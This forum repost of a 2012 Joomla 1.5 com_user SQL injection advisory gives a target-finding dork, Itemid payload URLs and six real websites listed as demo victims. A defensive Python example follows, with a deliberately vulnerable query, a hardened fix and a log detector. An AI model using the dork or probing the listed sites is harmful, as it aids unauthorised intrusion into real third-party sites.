
20.12.2012, 21:49
Guest
Posts: n/a
Time on forum: 216062
Репутация:
231
Joomla All v1.5 Error Based SQL Injection Vulnerability
Joomla Component com_user
####
# Exploit Title: Joomla All v1.5 Error Based SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: https://www.facebook.com/Algerian.Cyber.Army
# E-mail: islam_babia@hotmail.com
# Category: webapps
# script home : http://joomla.com
# Dork : inurl:option=com_user
# Security Risk: critical
# Tested on: Back|Track 5 KDE / French
####
# This was written for educational purposes only. Use it at your own risk.
# The author will not be responsible for any damage caused! The user assumes all responsibility.
# Intended for authorized web application pentesting only!
// Description :
The affected component is /com_user/ in all Joomla v1.5.
P.S.: you can find the version by opening the page source of the target and searching for "joomla"; you'll see the version.
// Exploit :
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=1+(sql injection)
http://site.com/index.php?option=com_user&view=reset&lang=en&Itemid=x+(sql injection) [replacing the id number by a character]
# priv8 youtube link, only people who have the link can view it:
http://www.youtube.com/watch?v=g0QcjxIb68I
// Demo :
http://www.lyceeairbus.com/index.php?option=com_user&view=reset&lang=en&Itemid=1'
http://www.silviajewelry.com/index.php?option=com_user&view=reset&Itemid='
http://www.bklogisticsvn.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://algeria.ch/index.php?option=com_user&view=reset&lang=en&Itemid='
http://www.emissary.com/index.php?option=com_user&view=reset&lang=en&Itemid='
http://lookdezine.com/main/index.php?option=com_user&view=reset&lang=en&Itemid='
# Greets To : ============================================================================
# The Algerian Cyber Army Team , KedAns-Dz , Klashincov3 , Kha&Mix , King Of Pirates ,
# D4NB4R , Inj3ct0r Team , jos_ali_joe , exploit-id team , OWASP Algeria
# ... And All Algerian Hax0rs
============================================================================================
# 1337day.com [2012-12-12]
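The post shows the symptom (a quote or a letter in Itemid producing a database error) but not the code pattern behind it. The following is an added example, not Joomla's code and not part of the posted advisory: it reproduces the vulnerable pattern (a numeric request parameter concatenated into SQL) against a constructed in-memory SQLite table, places the hardened form beside it (coerce to an integer the way PHP's (int) cast does, then bind the value), and adds a small log-line check that flags reset-view requests whose Itemid is not a plain integer. The `menu` table, the sample request lines and all function names are assumptions made for the illustration.

```python
"""Added illustration (not Joomla code): an integer parameter such as Itemid
spliced into a SQL string becomes an error-based injection; casting and
binding the value removes it.  The schema and sample data are constructed."""
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit


def _db():
    # Hypothetical menu table standing in for a CMS menu-item lookup.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE menu (id INTEGER PRIMARY KEY, title TEXT, link TEXT)")
    con.executemany(
        "INSERT INTO menu VALUES (?, ?, ?)",
        [(1, "Home", "index.php?option=com_content"),
         (2, "Reset", "index.php?option=com_user&view=reset")],
    )
    return con


def lookup_vulnerable(itemid):
    """Vulnerable pattern: the raw Itemid value is concatenated into the query."""
    con = _db()
    query = "SELECT title FROM menu WHERE id = " + str(itemid)
    try:
        row = con.execute(query).fetchone()
        return ("ok", row[0] if row else None)
    except sqlite3.Error as exc:
        # The database error text leaking to the response is the oracle an
        # error-based injection relies on ("1'" and "x" both trigger it).
        return ("error", str(exc))


def php_int_cast(value):
    """Mimic PHP's (int) cast: leading integer digits or 0 if there are none."""
    match = re.match(r"\s*([+-]?\d+)", str(value))
    return int(match.group(1)) if match else 0


def lookup_hardened(itemid):
    """Hardened form: coerce to int, then bind it as a parameter."""
    con = _db()
    row = con.execute(
        "SELECT title FROM menu WHERE id = ?", (php_int_cast(itemid),)
    ).fetchone()
    return ("ok", row[0] if row else None)


def is_sqli_probe(request_target):
    """Flag com_user reset-view requests whose Itemid is not a plain integer.

    Scoped to the surface named in the advisory; a non-numeric, non-empty
    Itemid there is the exact shape of the probes listed in the post."""
    qs = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    if qs.get("option") != ["com_user"] or qs.get("view") != ["reset"]:
        return False
    return any(v != "" and not re.fullmatch(r"\d+", v) for v in qs.get("Itemid", []))


# Constructed sample request targets, as they would appear in an access log.
SAMPLE_LOG = [
    "/index.php?option=com_user&view=reset&lang=en&Itemid=1",
    "/index.php?option=com_user&view=reset&lang=en&Itemid=1'",
    "/index.php?option=com_user&view=reset&Itemid=x",
    "/index.php?option=com_content&view=article&id=1'",
]


def scan(log_lines):
    """Return the request targets that look like reset-view Itemid probes."""
    return [line for line in log_lines if is_sqli_probe(line)]


if __name__ == "__main__":
    for value in ("1", "1'", "x"):
        print(repr(value), "vulnerable:", lookup_vulnerable(value),
              "hardened:", lookup_hardened(value))
    print("flagged:", scan(SAMPLE_LOG))
```

Note that the hardened lookup never errors: `1'` is cast to 1 and `x` to 0, so the attacker loses the error oracle and any string they supply is treated as a number. The log check is deliberately narrow (only the option/view pair from the advisory), so it produces no alerts for ordinary non-numeric parameters elsewhere on the site.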